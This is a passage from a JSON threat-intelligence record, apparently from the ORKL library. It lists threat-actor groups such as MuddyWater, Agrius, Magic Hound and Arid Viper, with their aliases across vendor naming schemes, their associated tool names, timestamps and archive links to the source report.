[ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3ce91297-e4c0-4957-8dd7-9047a3e23dc7", "created_at": "2023-01-06T13:46:39.054248Z", "updated_at": "2026-04-10T02:00:03.197801Z", "deleted_at": null, "main_name": "Tortoiseshell", "aliases": [ "Yellow Liderc", "Imperial Kitten", "Crimson Sandstorm", "Cuboid Sandstorm", "Smoke Sandstorm", "IMPERIAL KITTEN", "TA456", "DUSTYCAVE", "CURIUM" ], "source_name": "MISPGALAXY:Tortoiseshell", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "21e01940-3851-417f-9e90-1a4a2da07033", "created_at": "2022-10-25T16:07:23.299369Z", "updated_at": "2026-04-10T02:00:04.527895Z", "deleted_at": null, "main_name": "Agrius", "aliases": [ "AMERICIUM", "Agonizing Serpens", "BlackShadow", "DEV-0227", "Pink Sandstorm", "SharpBoys", "Spectral Kitten" ], "source_name": "ETDA:Agrius", "tools": [ "ASPXSpy", "ASPXTool", "Agrius", "BFG Agonizer", "BFG Agonizer Wiper", "DEADWOOD", "DETBOSIT", "Detbosit", "IPsec Helper", "Moneybird", "MultiLayer Wiper", "PW", "PartialWasher", "PartialWasher Wiper", "SQLShred", "Sqlextractor" ], "source_id": "ETDA", "reports": null }, { "id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d", "created_at": "2022-10-25T16:07:23.539852Z", "updated_at": "2026-04-10T02:00:04.647734Z", "deleted_at": null, "main_name": "Desert Falcons", "aliases": [ "APT-C-23", "ATK 66", "Arid Viper", "Niobium", "Operation Arid Viper", "Operation Bearded Barbie", "Operation Rebound", "Pinstripe Lightning", "Renegade Jackal", "TAG-63", "TAG-CT1", "Two-tailed Scorpion" ], "source_name": "ETDA:Desert Falcons", "tools": [ "AridSpy", "Barb(ie) Downloader", "BarbWire", "Desert Scorpion", "FrozenCell", "GlanceLove", "GnatSpy", "KasperAgent", "Micropsia", "PyMICROPSIA", "SpyC23", "Viper RAT", "ViperRAT", "VolatileVenom", "WinkChat", "android.micropsia" ], "source_id": "ETDA", "reports": null }, { "id": "4134675e-5b72-4b50-8d70-1a8f18aafbb4", "created_at": "2024-10-04T02:00:04.766263Z", "updated_at": "2026-04-10T02:00:03.715945Z", "deleted_at": null, "main_name": "Handala", "aliases": [], "source_name": "MISPGALAXY:Handala", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b1979c55-037a-415f-b0a3-cab7933f5cd4", "created_at": "2024-04-24T02:00:49.561432Z", "updated_at": "2026-04-10T02:00:05.416794Z", "deleted_at": null, "main_name": "APT-C-23", "aliases": [ "APT-C-23", "Arid Viper", "Desert Falcon", "TAG-63", "Grey Karkadann", "Big Bang APT", "Two-tailed Scorpion" ], "source_name": "MITRE:APT-C-23", "tools": [ "Micropsia" ], "source_id": "MITRE", "reports": null }, { "id": "d1dcfc37-1f9b-4acd-a023-25153f183c2e", "created_at": "2025-08-07T02:03:24.783147Z", "updated_at": "2026-04-10T02:00:03.664754Z", "deleted_at": null, "main_name": "COBALT SHADOW", "aliases": [ "AMERICIUM ", "Agonizing Serpens ", "Agrius", "Agrius ", "BlackShadow", "DEV-0227 ", "Justice Blade ", "Malek Team", "Malek Team ", "MoneyBird ", "Pink Sandstorm ", "Sharp Boyz ", "Spectral Kitten " ], "source_name": "Secureworks:COBALT SHADOW", "tools": [ "Apostle", "DEADWOOD", "Fantasy wiper", "IPsec Helper", "MiniDump", "Moneybird ransomware", "Sandals", "SecretsDump" ], "source_id": "Secureworks", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "929d794b-0e1d-4d10-93a6-29408a527cc2", "created_at": "2023-01-06T13:46:38.70844Z", "updated_at": "2026-04-10T02:00:03.075002Z", "deleted_at": null, "main_name": "AridViper", "aliases": [ "Desert Falcon", "Arid Viper", "APT-C-23", "Bearded Barbie", "Two-tailed Scorpion" ], "source_name": "MISPGALAXY:AridViper", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4023e661-f566-4b5b-a06f-9d370403f074", "created_at": "2024-02-02T02:00:04.064685Z", "updated_at": "2026-04-10T02:00:03.547155Z", "deleted_at": null, "main_name": "Pink Sandstorm", "aliases": [ "AMERICIUM", "BlackShadow", "DEV-0022", "Agrius", "Agonizing Serpens", "UNC2428", "Black Shadow", "SPECTRAL KITTEN" ], "source_name": "MISPGALAXY:Pink Sandstorm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "8d28f58b-5ea2-4450-a74a-4a1e39caba6e", "created_at": "2026-03-16T02:02:50.582318Z", "updated_at": "2026-04-10T02:00:03.777263Z", "deleted_at": null, "main_name": "COASTLIGHT", "aliases": [ "Gonjeshke Darande", "Indra", "Predatory Sparrow" ], "source_name": "Secureworks:COASTLIGHT", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "7d982d5b-3428-483c-8804-c3ab774f1861", "created_at": "2024-11-01T02:00:52.70975Z", "updated_at": "2026-04-10T02:00:05.357255Z", "deleted_at": null, "main_name": "Agrius", "aliases": [ "Agrius", "Pink Sandstorm", "AMERICIUM", "Agonizing Serpens", "BlackShadow" ], "source_name": "MITRE:Agrius", "tools": [ "NBTscan", "Mimikatz", "IPsec Helper", "Moneybird", "MultiLayer Wiper", "DEADWOOD", "BFG Agonizer", "ASPXSpy" ], "source_id": "MITRE", "reports": null }, { "id": "786139da-4139-49d0-9685-e249c5f89f25", "created_at": "2024-12-30T02:01:48.731055Z", "updated_at": "2026-04-10T02:00:04.763086Z", "deleted_at": null, "main_name": "TA455", "aliases": [ "Bohrium", "DEV-0056", "Operation Iranian Dream Job", "Smoke Sandstorm", "TA455", "UNC1549", "Yellow Dev 13" ], "source_name": "ETDA:TA455", "tools": [ "LIGHTRAIL", "MINIBIKE", "SlugResin", "SnailResin" ], "source_id": "ETDA", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "7f25e108-e694-49b6-a494-c8458b33eb3f", "created_at": "2024-01-09T02:00:04.199217Z", "updated_at": "2026-04-10T02:00:03.509338Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [], "source_name": "MISPGALAXY:HomeLand Justice", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf", "created_at": "2024-01-18T02:02:34.189827Z", "updated_at": "2026-04-10T02:00:04.721082Z", "deleted_at": null, "main_name": "HomeLand Justice", "aliases": [ "Banished Kitten", "Karma", "Red Sandstorm", "Storm-0842", "Void Manticore" ], "source_name": "ETDA:HomeLand Justice", "tools": [ "BABYWIPER", "BiBi Wiper", "BiBi-Linux Wiper", "BiBi-Windows Wiper", "Cl Wiper", "LowEraser", "No-Justice Wiper", "Plink", "PuTTY Link", "RevSocks", "W2K Res Kit" ], "source_id": "ETDA", "reports": null }, { "id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb", "created_at": "2025-08-07T02:03:24.769383Z", "updated_at": "2026-04-10T02:00:03.860954Z", "deleted_at": null, "main_name": "COBALT MYSTIQUE", "aliases": [ "Banished Kitten ", "DEV-0842 ", "Druidfly ", "Handala Hack Team", "Homeland Justice", "Karmabelow80", "Red Sandstorm ", "Storm-0842 ", "Void Manticore " ], "source_name": "Secureworks:COBALT MYSTIQUE", "tools": [ "AllinOneNeo", "Bibi", "GramPy", "GramPyLoader" ], "source_id": "Secureworks", "reports": null }, { "id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b", "created_at": "2025-08-07T02:03:24.53077Z", "updated_at": "2026-04-10T02:00:03.680525Z", "deleted_at": null, "main_name": "ALUMINUM SARATOGA", "aliases": [ "APT-C-23", "Arid Viper", "Desert Falcon", "Extreme Jackal ", "Gaza Cybergang", "Molerats ", "Operation DustySky ", "TA402" ], "source_name": "Secureworks:ALUMINUM SARATOGA", "tools": [ "BlackShades", "BrittleBush", "DarkComet", "LastConn", "Micropsia", "NimbleMamba", "PoisonIvy", "QuasarRAT", "XtremeRat" ], "source_id": "Secureworks", "reports": null }, { "id": "35b3e533-7483-4f07-894e-2bb3ac855207", "created_at": "2025-08-07T02:03:24.540035Z", "updated_at": "2026-04-10T02:00:03.69627Z", "deleted_at": null, "main_name": "ALUMINUM SHADYSIDE", "aliases": [ "APT-C-23 ", "Arid Viper ", "Desert Falcon " ], "source_name": "Secureworks:ALUMINUM SHADYSIDE", "tools": [ "Micropsia", "SpyC23" ], "source_id": "Secureworks", "reports": null }, { "id": "b0d51a1b-38b1-4cfb-bee0-cad7ad2b9651", "created_at": "2025-05-29T02:00:03.196955Z", "updated_at": "2026-04-10T02:00:03.852653Z", "deleted_at": null, "main_name": "DieNet", "aliases": [ "Shiite_Harvest" ], "source_name": "MISPGALAXY:DieNet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0dc20eeb-81e3-48ef-9a12-7b38fdcf07b1", "created_at": "2025-09-20T02:04:46.693616Z", "updated_at": "2026-04-10T02:00:03.735806Z", "deleted_at": null, "main_name": "COBALT SMOKEY", "aliases": [ "Nimbus Manticore ", "Smoke Sandstorm ", "Subtle Snail ", "TA455 ", "UNC1549 " ], "source_name": "Secureworks:COBALT SMOKEY", "tools": [ "LIGHTRAIL", "MINIBIKE", "MINIBUS" ], "source_id": "Secureworks", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null }, { "id": "219ddb41-2ea8-4121-8b63-8c762f7e15df", "created_at": "2023-01-06T13:46:39.384442Z", "updated_at": "2026-04-10T02:00:03.309654Z", "deleted_at": null, "main_name": "Predatory Sparrow", "aliases": [ "Indra", "Gonjeshke Darande" ], "source_name": "MISPGALAXY:Predatory Sparrow", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434471, "ts_updated_at": 1775792119, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f77e3b05ceeff8819d6be2144932817ad3edc2a7.pdf", "text": "https://archive.orkl.eu/f77e3b05ceeff8819d6be2144932817ad3edc2a7.txt", "img": "https://archive.orkl.eu/f77e3b05ceeff8819d6be2144932817ad3edc2a7.jpg" } }